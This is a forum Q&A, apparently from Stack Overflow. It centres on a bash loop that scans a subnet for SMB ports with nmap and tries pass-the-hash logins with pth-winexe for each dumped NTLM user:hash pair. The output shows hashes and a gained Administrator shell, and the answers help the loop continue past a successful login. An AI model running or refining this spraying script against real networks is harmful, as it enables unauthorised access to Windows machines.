# Bash - Exit Windows Command Prompt nicely

Tags: linux, windows, bash, for-loop, exit

I have a bash script with a `foreach` loop that will attempt to login to various different user accounts and notify me when it has successfully been able to login. Upon logging in successfully I will get a Windows Command Prompt in return.

This is where my problem starts, because once a successful login occurs instead of exiting the Windows Command Prompt and then carrying on trying to login to other accounts, the commands actually get entered in the Windows Command Prompt and obviously do not work.

**My code:**

```
#!/bin/bash

echo "[*] Usage : $0 <hashfile> <ip or iprange>"
hashfile=$1
iprange=$2

echo "[*] Trying to login "

for host in $(nmap -p 139,445 $iprange -oG - | grep [0-9]/open | cut -d ' ' -f2); do
    while IFS=: read -r smbuser f2 f3 f4 rest; do
        smbhash="${f3}:${f4}"
        echo
        echo "[+] DOING $smbuser@$host with HASH: $smbhash"
        pth-winexe -U $smbuser%$smbhash //$host cmd;  #the code that tries to login
    done < "$hashfile"
done
```

**The script output:**

```
    [+] DOING lisa@192.168.1.22 with HASH: c1e4767bca5d1200aad3b435b51404ee:8280f06d9948afe0ea8eee72304de490
    E_md4hash wrapper called.
    HASH PASS: Substituting user supplied NTLM HASH...
    ERROR: Failed to open connection - NT_STATUS_LOGON_FAILURE

    [+] DOING mark@192.168.1.22 with HASH: 6ff8898d3889a0edaad3b435b51404ee:6a0426f4d83012b9705d6c103bfb0db9
    E_md4hash wrapper called.
    HASH PASS: Substituting user supplied NTLM HASH...
    ERROR: Failed to open connection - NT_STATUS_LOGON_FAILURE

    [+] DOING Administrator@192.168.1.23 with HASH: 7bfd3ee62cbb0eba886450c5d6c50f12:f3acbe7ec27aadbe8deeaa0c651a64af
    E_md4hash wrapper called.
    HASH PASS: Substituting user supplied NTLM HASH...
    Microsoft Windows 2000 [Version 5.00.2195]
    (C) Copyright 1985-2000 Microsoft Corp.

    C:\WINNT\system32>alice:1008:7025c6546ad4eaf2944e2df489a880e4:5569fc0d643cda8944c18fb1abbfc3f4:::
    The filename, directory name, or volume label syntax is incorrect.
    The filename, directory name, or volume label syntax is incorrect.

    C:\WINNT\system32>backup:1006:16ac416c2658e00daad3b435b51404ee:938df8b296dd15d0dce8eaa37be593e0:::

    C:\WINNT\system32>david:1009:aebd4de384c7ec43aad3b435b51404ee:7a21990fcd3d759941e45c490f143d5f:::
    The filename, directory name, or volume label syntax is incorrect.
    The filename, directory name, or volume label syntax is incorrect.

    C:\WINNT\system32>Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

    C:\WINNT\system32>IUSR_SRV2:1002:f7d96ebcbe5b6be3103ccb00190f6271:09ff503707453d56bb69f40bef542da0:::

    The filename, directory name, or volume label syntax is incorrect.
    The filename, directory name, or volume label syntax is incorrect.

    C:\WINNT\system32>
```

You can see in the script output shown above that when `Administrator@192.168.1.23 with HASH: 7bfd3ee62cbb0eba886450c5d6c50f12:f3acbe7ec27aadbe8deeaa0c651a64af` works and provides me with a C:/Windows/system32 prompt the script does not realise this and just continues not realising the commands are being entered in the Windows Command Prompt.

**My problem:**

When a successful login occurs and I get the Windows Command Prompt (e.g C:\Windows\system32) how do I then exit the Windows Command Prompt I just got and get the bash script to carry on executing the rest of the login attempts.

Comment: May be expect(1) is what you want?

Comment: Yes, use `expect`, then when you get what you want, use `interact` to allow you to continue interacting with the program.

Comment: did you try harder?

Answer (score 1):

You can probably change your `cmd` command to `cmd /C` as this will cause the shell to immediately terminate.

See here: http://ss64.com/nt/cmd.html

Comment: This does not seem to work with the pth-winexe program I am using to authenticate?

Comment: What *exactly* do you mean by "does not seem to work"? It just exits without printing anything so may appear that way. Do you have to actually call `cmd`? May be easier to call another program that doesn't give you an interactive prompt.